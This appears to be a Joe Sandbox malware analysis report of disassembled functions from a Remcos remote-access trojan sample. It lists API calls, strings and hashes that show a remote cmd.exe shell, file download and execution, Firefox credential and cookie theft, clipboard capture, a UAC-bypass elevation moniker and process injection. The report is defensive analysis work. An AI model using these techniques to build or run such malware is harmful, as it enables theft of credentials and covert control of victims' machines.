                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: pQG
                                    • API String ID: 176396367-3769108836
                                    • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                    • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                    • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                    • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B7CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID: @
                                    • API String ID: 1890195054-2766056989
                                    • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                    • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                    • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                    • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                      • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEventStartupsocket
                                    • String ID:
                                    • API String ID: 1953588214-0
                                    • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                    • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                    • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                    • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                    • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0041BAB8
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ForegroundText
                                    • String ID:
                                    • API String ID: 29597999-0
                                    • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                    • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                    • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                    • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004500D4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                    • _free.LIBCMT ref: 00450140
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                    • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                    • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                    • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                    • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                    • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                    • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startup
                                    • String ID:
                                    • API String ID: 724789610-0
                                    • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                    • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                    • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                    • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                    • DeleteFileA.KERNEL32(?), ref: 00408652
                                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                    • API String ID: 1067849700-181434739
                                    • Opcode ID: 365c292aa1571a8d7161d96b4c003a35a4d8bf20842a391a35ee013fa3951f57
                                    • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                    • Opcode Fuzzy Hash: 365c292aa1571a8d7161d96b4c003a35a4d8bf20842a391a35ee013fa3951f57
                                    • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                    • CloseHandle.KERNEL32 ref: 00405A23
                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                    • CloseHandle.KERNEL32 ref: 00405A45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                    • API String ID: 2994406822-18413064
                                    • Opcode ID: dd01ecda73a6b06cf9be688a0092eaf718524a90761ad714d388e20eb5f9c59a
                                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                    • Opcode Fuzzy Hash: dd01ecda73a6b06cf9be688a0092eaf718524a90761ad714d388e20eb5f9c59a
                                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.KERNELBASE(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                    • API String ID: 3018269243-13974260
                                    • Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                    • Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                    • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 004168C2
                                    • EmptyClipboard.USER32 ref: 004168D0
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: !D@
                                    • API String ID: 3520204547-604454484
                                    • Opcode ID: edcd9e1cfb621903c724fa8279626316680223ca65fdea0f460b8bc07cf15baa
                                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                    • Opcode Fuzzy Hash: edcd9e1cfb621903c724fa8279626316680223ca65fdea0f460b8bc07cf15baa
                                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$File$FirstNext
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 3527384056-432212279
                                    • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                    • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                    • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                    • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                    • API String ID: 3756808967-1743721670
                                    • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                    • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                    • API String ID: 0-1861860590
                                    • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                    • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 00407521
                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Object_wcslen
                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    • API String ID: 240030777-3166923314
                                    • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                    • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                    • String ID:
                                    • API String ID: 3587775597-0
                                    • Opcode ID: 8be6c0db88263c078c4d0e26e1b320dd21e80ff956e73d25d1154f48fd66f17a
                                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                    • Opcode Fuzzy Hash: 8be6c0db88263c078c4d0e26e1b320dd21e80ff956e73d25d1154f48fd66f17a
                                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

